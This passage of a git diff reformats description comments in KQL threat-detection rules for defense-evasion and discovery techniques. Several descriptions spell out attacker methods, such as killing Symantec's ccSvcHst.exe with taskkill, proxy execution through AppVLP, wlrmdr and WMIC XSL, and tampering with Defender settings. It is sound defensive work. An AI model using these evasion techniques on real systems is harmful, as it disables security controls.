arguments that have been used by threat actors and malware. It provides system hardware information. -This process is primarily used to detect and avoid virtualization and analysis environments. - +// This process is primarily used to detect and avoid virtualization and analysis environments. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1497.001, attack.discovery, attack.t1082 // False Positives: diff --git a/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql b/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql index 5e2e5392..c495f662 100644 --- a/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql +++ b/KQL/rules/Defense Evasion/taskkill_symantec_endpoint_protection.kql @@ -3,9 +3,8 @@ // Date: 2022-09-13 // Level: high // Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection. -Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. -As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. - +// Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. +// As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 diff --git a/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql b/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql index b03e4751..7dc6f0b7 100644 --- a/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql +++ b/KQL/rules/Defense Evasion/uncommon_addinutil_exe_commandline_execution.kql @@ -3,7 +3,6 @@ // Date: 2023-09-18 // Level: medium // Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql index e48f2624..0fdfd14b 100644 --- a/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql +++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_addinutil_exe.kql @@ -3,7 +3,6 @@ // Date: 2023-09-18 // Level: medium // Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql index 74008bae..1d237a37 100644 --- a/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql +++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_appvlp_exe.kql @@ -3,10 +3,9 @@ // Date: 2020-03-13 // Level: medium // Description: Detects uncommon child processes of Appvlp.EXE -Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. -Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder -or to mark a file as a system file. - +// Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. +// Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder +// or to mark a file as a system file. // MITRE Tactic: Defense Evasion // Tags: attack.t1218, attack.defense-evasion, attack.execution diff --git a/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql b/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql index 6d60358e..abbad71c 100644 --- a/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql +++ b/KQL/rules/Defense Evasion/uncommon_child_process_of_setres_exe.kql @@ -3,9 +3,8 @@ // Date: 2022-12-11 // Level: high // Description: Detects uncommon child process of Setres.EXE. -Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. -It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path. - +// Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. +// It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218, attack.t1202 // False Positives: diff --git a/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql index c7f78337..86cac343 100644 --- a/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql +++ b/KQL/rules/Defense Evasion/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql @@ -3,9 +3,8 @@ // Date: 2023-11-21 // Level: high // Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. -Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. -IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. - +// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. +// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 // False Positives: diff --git a/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql b/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql index 00504d88..1a3263ab 100644 --- a/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql +++ b/KQL/rules/Defense Evasion/uncommon_file_creation_by_mysql_daemon_process.kql @@ -3,8 +3,7 @@ // Date: 2024-05-27 // Level: high // Description: Detects the creation of files with scripting or executable extensions by Mysql daemon. -Which could be an indicator of "User Defined Functions" abuse to download malware. - +// Which could be an indicator of "User Defined Functions" abuse to download malware. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion diff --git a/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql b/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql index 1a9de40f..b3cae963 100644 --- a/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql +++ b/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql @@ -3,7 +3,6 @@ // Date: 2022-01-04 // Level: high // Description: Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion diff --git a/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql b/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql index 5e376ce7..1ada023b 100644 --- a/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql +++ b/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql @@ -3,11 +3,10 @@ // Date: 2022-08-22 // Level: medium // Description: Detects an uncommon parent process of "LINK.EXE". -Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation. -Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity. -This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location. -By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious. - +// Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation. +// Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity. +// This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location. +// By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 diff --git a/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql b/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql index 7bc7d4f3..b6d06909 100644 --- a/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql +++ b/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql @@ -3,7 +3,6 @@ // Date: 2019-10-24 // Level: medium // Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.credential-access, attack.t1558, attack.lateral-movement, attack.t1550.003 // False Positives: diff --git a/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql b/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql index e5245706..726a5a94 100644 --- a/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql +++ b/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql @@ -3,7 +3,6 @@ // Date: 2022-08-19 // Level: medium // Description: Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1216 diff --git a/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql b/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql index 9c84f6ec..aee95ba2 100644 --- a/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql +++ b/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql @@ -3,8 +3,7 @@ // Date: 2022-09-14 // Level: medium // Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. -An example would be a threat actor creating a new user via the net command and providing the password inline - +// An example would be a threat actor creating a new user via the net command and providing the password inline // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution // False Positives: diff --git a/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql b/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql index 3039937b..e899bc16 100644 --- a/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql +++ b/KQL/rules/Defense Evasion/wfp_filter_added_via_registry.kql @@ -3,7 +3,6 @@ // Date: 2025-10-23 // Level: medium // Description: Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.t1562, attack.t1569.002 diff --git a/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql b/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql index d73e7171..e664bc20 100644 --- a/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql +++ b/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql @@ -3,9 +3,8 @@ // Date: 2025-07-09 // Level: high // Description: Detects the use of reg.exe or PowerShell to delete the Windows Defender context menu handler registry keys. -This action removes the "Scan with Microsoft Defender" option from the right-click menu for files, directories, and drives. -Attackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product. - +// This action removes the "Scan with Microsoft Defender" option from the right-click menu for files, directories, and drives. +// Attackers may use this technique to hinder manual, on-demand scans and reduce the visibility of the security product. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 // False Positives: diff --git a/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql b/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql index da30cb5a..feb92ebb 100644 --- a/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql +++ b/KQL/rules/Defense Evasion/windows_defender_exclusion_list_modified.kql @@ -3,7 +3,6 @@ // Date: 2019-10-26 // Level: medium // Description: Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security. - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 // False Positives: diff --git a/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql b/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql index d6ec4baa..9575bbfd 100644 --- a/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql +++ b/KQL/rules/Defense Evasion/windows_defender_threat_severity_default_action_modified.kql @@ -3,9 +3,8 @@ // Date: 2025-07-11 // Level: high // Description: Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'. -This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level, -allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads. - +// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level, +// allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562.001 // False Positives: diff --git a/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql b/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql index 3ee057af..d182d027 100644 --- a/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql +++ b/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql @@ -3,8 +3,7 @@ // Date: 2022-02-16 // Level: medium // Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries. -This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry. - +// This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1218 diff --git a/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql b/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql index 8b9c5f90..32824f74 100644 --- a/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql +++ b/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql @@ -3,8 +3,7 @@ // Date: 2021-06-11 // Level: medium // Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. -This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group. - +// This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1562 diff --git a/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql b/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql index 7807774f..0be93573 100644 --- a/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql +++ b/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql @@ -3,7 +3,6 @@ // Date: 2022-07-01 // Level: medium // Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL - // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.execution, attack.t1218 // False Positives: diff --git a/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql b/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql index 9b3691dc..c3d95d22 100644 --- a/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql +++ b/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql @@ -3,9 +3,8 @@ // Date: 2019-10-21 // Level: medium // Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files. -Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. -Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. - +// Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. +// Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1220 // False Positives: diff --git a/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql b/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql index 8fcbe710..b32cb1dd 100644 --- a/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql +++ b/KQL/rules/Discovery/azure_ad_health_monitoring_agent_registry_keys_access.kql @@ -3,8 +3,7 @@ // Date: 2021-08-26 // Level: medium // Description: This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. -This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent. - +// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1012 diff --git a/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql b/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql index 2174de59..8bc9d78c 100644 --- a/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql +++ b/KQL/rules/Discovery/azure_ad_health_service_agents_registry_keys_access.kql @@ -3,10 +3,9 @@ // Date: 2021-08-26 // Level: medium // Description: This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). -Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). -This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. -Make sure you set the SACL to propagate to its sub-keys. - +// Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). +// This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. +// Make sure you set the SACL to propagate to its sub-keys. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1012 diff --git a/KQL/rules/Discovery/file_and_directory_discovery_linux.kql b/KQL/rules/Discovery/file_and_directory_discovery_linux.kql index b0ad098f..b549c73f 100644 --- a/KQL/rules/Discovery/file_and_directory_discovery_linux.kql +++ b/KQL/rules/Discovery/file_and_directory_discovery_linux.kql @@ -3,7 +3,6 @@ // Date: 2020-10-19 // Level: informational // Description: Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares. - // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1083 // False Positives: diff --git a/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql b/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql index f0558c42..a23b223f 100644 --- a/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql +++ b/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql @@ -3,7 +3,6 @@ // Date: 2021-12-13 // Level: low // Description: Detects usage of the "dir" command part of Windows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories. - // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1217 // False Positives: diff --git a/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql b/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql index a5a3af68..2d05a0d3 100644 --- a/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql +++ b/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql @@ -3,7 +3,6 @@ // Date: 2022-12-22 // Level: high // Description: Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder. - // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1135 diff --git a/KQL/rules/Discovery/hacktool_certipy_execution.kql b/KQL/rules/Discovery/hacktool_certipy_execution.kql index 91f88bca..64a183b5 100644 --- a/KQL/rules/Discovery/hacktool_certipy_execution.kql +++ b/KQL/rules/Discovery/hacktool_certipy_execution.kql @@ -3,7 +3,6 @@ // Date: 2023-04-17 // Level: high // Description: Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments. - // MITRE Tactic: Discovery // Tags: attack.discovery, attack.credential-access, attack.t1649 // False Positives: diff --git a/KQL/rules/Discovery/hacktool_soaphound_execution.kql b/KQL/rules/Discovery/hacktool_soaphound_execution.kql index 34ad28ef..a3e8f54f 100644 --- a/KQL/rules/Discovery/hacktool_soaphound_execution.kql +++ b/KQL/rules/Discovery/hacktool_soaphound_execution.kql @@ -3,7 +3,6 @@ // Date: 2024-01-26 // Level: high // Description: Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information. - // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1087 diff --git a/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql b/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql index 0fb156fc..bb4a6fe7 100644 --- a/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Discovery/local_groups_reconnaissance_via_wmic_exe.kql @@ -3,10 +3,9 @@ // Date: 2021-12-12 // Level: low // Description: Detects the execution of "wmic" with the "group" flag. -Adversaries may attempt to find local system groups and permission settings. -The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. -Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. - +// Adversaries may attempt to find local system groups and permission settings. +// The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. +// Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1069.001 diff --git a/KQL/rules/Discovery/network_sniffing_macos.kql b/KQL/rules/Discovery/network_sniffing_macos.kql index 3a12f8a6..5e3c4ee1 100644 --- a/KQL/rules/Discovery/network_sniffing_macos.kql +++ b/KQL/rules/Discovery/network_sniffing_macos.kql @@ -3,8 +3,7 @@ // Date: 2020-10-14 // Level: informational // Description: Detects the usage of tooling to sniff network traffic. -An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. - +// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.credential-access, attack.t1040 // False Positives: diff --git a/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql b/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql index 49bf1bae..752a9f90 100644 --- a/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql +++ b/KQL/rules/Discovery/os_architecture_discovery_via_grep.kql @@ -3,7 +3,6 @@ // Date: 2023-06-02 // Level: low // Description: Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo" - // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1082 diff --git a/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql b/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql index 18f18f6b..5b8b9489 100644 --- a/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql +++ b/KQL/rules/Discovery/pnscan_binary_data_transmission_activity.kql @@ -3,8 +3,7 @@ // Date: 2024-04-16 // Level: medium // Description: Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. -This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT - +// This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1046 diff --git a/KQL/rules/Discovery/pua_adidnsdump_execution.kql b/KQL/rules/Discovery/pua_adidnsdump_execution.kql index 79eeabda..c8380722 100644 --- a/KQL/rules/Discovery/pua_adidnsdump_execution.kql +++ b/KQL/rules/Discovery/pua_adidnsdump_execution.kql @@ -3,8 +3,7 @@ // Date: 2022-01-01 // Level: low // Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, -Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP - +// Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1018 diff --git a/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql b/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql index 7b58afa9..c4f77b5c 100644 --- a/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql +++ b/KQL/rules/Discovery/pua_softperfect_netscan_execution.kql @@ -3,8 +3,7 @@ // Date: 2024-04-25 // Level: medium // Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks. -It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim. - +// It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1046 // False Positives: diff --git a/KQL/rules/Discovery/pua_trufflehog_execution.kql b/KQL/rules/Discovery/pua_trufflehog_execution.kql index 167f98c1..4de2bd44 100644 --- a/KQL/rules/Discovery/pua_trufflehog_execution.kql +++ b/KQL/rules/Discovery/pua_trufflehog_execution.kql @@ -3,9 +3,8 @@ // Date: 2025-09-24 // Level: medium // Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. -While it is a legitimate tool, intended for use in CI pipelines and security assessments, -It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information. - +// While it is a legitimate tool, intended for use in CI pipelines and security assessments, +// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001 // False Positives: diff --git a/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql b/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql index 1ea32800..c1cfd9c1 100644 --- a/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql +++ b/KQL/rules/Discovery/pua_trufflehog_execution_linux.kql @@ -3,9 +3,8 @@ // Date: 2025-09-24 // Level: medium // Description: Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. -While it is a legitimate tool, intended for use in CI pipelines and security assessments, -It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information. - +// While it is a legitimate tool, intended for use in CI pipelines and security assessments, +// It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.credential-access, attack.t1083, attack.t1552.001 // False Positives: diff --git a/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql b/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql index 1ca3a7f5..eb4754c8 100644 --- a/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql +++ b/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql @@ -3,8 +3,7 @@ // Date: 2023-07-06 // Level: medium // Description: Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. -Attackers often time use this technique to extract specific information they require in their reconnaissance phase. - +// Attackers often time use this technique to extract specific information they require in their reconnaissance phase. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1057 diff --git a/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql b/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql index 7a8b4c02..127e33b3 100644 --- a/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql +++ b/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql @@ -3,8 +3,7 @@ // Date: 2023-10-20 // Level: medium // Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. -This detection focuses on the keywords that the attacker might use as a filter. - +// This detection focuses on the keywords that the attacker might use as a filter. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1518.001 diff --git a/KQL/rules/Discovery/shell_execution_gcc_linux.kql b/KQL/rules/Discovery/shell_execution_gcc_linux.kql index f26d978b..e3fb57c5 100644 --- a/KQL/rules/Discovery/shell_execution_gcc_linux.kql +++ b/KQL/rules/Discovery/shell_execution_gcc_linux.kql @@ -3,7 +3,6 @@ // Date: 2024-09-02 // Level: high // Description: Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. - // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1083 diff --git a/KQL/rules/Discovery/shell_execution_via_find_linux.kql b/KQL/rules/Discovery/shell_execution_via_find_linux.kql index b67ef0be..c35bbc2d 100644 --- a/KQL/rules/Discovery/shell_execution_via_find_linux.kql +++ b/KQL/rules/Discovery/shell_execution_via_find_linux.kql @@ -3,7 +3,6 @@ // Date: 2024-09-02 // Level: high // Description: Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt. - // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1083 diff --git 